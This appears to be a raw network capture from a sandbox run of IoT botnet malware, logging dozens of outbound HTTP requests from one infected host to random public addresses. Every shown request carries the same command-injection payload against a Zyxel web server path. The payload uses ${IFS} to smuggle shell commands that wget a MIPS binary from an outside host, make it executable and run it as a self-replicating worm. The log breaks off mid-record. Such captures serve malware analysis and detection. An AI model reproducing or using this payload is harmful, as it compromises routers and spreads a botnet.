                                                Jan 29, 2024 07:07:48.340256929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4230192.168.2.235666649.42.74.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340293884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4231192.168.2.2341228125.223.208.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340351105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4232192.168.2.2353486157.213.215.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340380907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4233192.168.2.2350144104.48.246.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340401888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4234192.168.2.2335110174.12.203.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340456963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4235192.168.2.2338092152.174.183.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340495110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4236192.168.2.2333646123.30.226.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340543032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4237192.168.2.2352226195.128.32.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340579033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4238192.168.2.2333958148.50.136.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340616941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4239192.168.2.233282425.69.182.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340662956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4240192.168.2.234655088.174.200.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340689898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4241192.168.2.235431636.98.237.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340738058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4242192.168.2.2340028119.24.195.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340764046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4243192.168.2.2350824221.120.31.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340806961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4244192.168.2.2353184101.182.23.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340857983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4245192.168.2.234884479.174.162.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340857983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4246192.168.2.2352670122.150.148.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340929985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4247192.168.2.233480818.210.247.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340966940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4248192.168.2.2345574160.148.153.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.340996027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4249192.168.2.235050097.6.195.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341067076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4250192.168.2.2338350149.250.249.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341084957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4251192.168.2.235443867.152.219.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341139078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4252192.168.2.234421075.172.45.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341165066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4253192.168.2.235383019.133.14.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341227055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4254192.168.2.2353332154.138.49.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341247082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4255192.168.2.2354450178.229.72.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341309071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4256192.168.2.234868452.81.148.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341320992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4257192.168.2.2350036140.186.215.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341351986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4258192.168.2.2337710201.112.124.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341379881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4259192.168.2.2352288119.6.210.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341427088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4260192.168.2.2335840108.169.162.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341478109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4261192.168.2.2335106210.74.113.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341481924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4262192.168.2.2334364133.59.151.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341525078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4263192.168.2.234577465.107.196.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341577053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4264192.168.2.2347546142.92.157.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341619968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4265192.168.2.233779213.49.79.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341655970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4266192.168.2.234500654.184.194.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341681004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4267192.168.2.235513235.136.192.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341743946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4268192.168.2.2343782149.98.59.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341800928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4269192.168.2.235840044.131.167.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341820002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4270192.168.2.2343636139.52.152.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341837883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4271192.168.2.2340384150.110.49.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341871977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4272192.168.2.2333574130.89.57.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341928959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4273192.168.2.2352062176.89.75.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.341969967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4274192.168.2.2342088174.201.255.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342009068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4275192.168.2.234028490.218.73.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342044115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4276192.168.2.234505295.159.200.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342078924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4277192.168.2.2338154141.232.173.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342135906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4278192.168.2.2354682157.199.141.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342173100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4279192.168.2.2341534105.58.48.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342215061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4280192.168.2.2340140119.230.180.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342261076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4281192.168.2.2356324194.74.172.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342300892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4282192.168.2.234052823.7.48.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342336893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4283192.168.2.2347988113.133.212.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342371941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4284192.168.2.2340360182.77.74.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342430115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4285192.168.2.235343697.37.100.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342473984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4286192.168.2.233895874.212.15.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342499018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4287192.168.2.23496844.3.130.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342533112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4288192.168.2.23509248.131.94.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342575073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4289192.168.2.233560639.90.67.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342607021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4290192.168.2.2335978137.173.40.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342648029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4291192.168.2.2360338207.52.236.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342694998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4292192.168.2.2350540189.156.173.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:48.342725039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4293192.168.2.2347308114.144.43.157443
                                                TimestampBytes transferredDirectionData
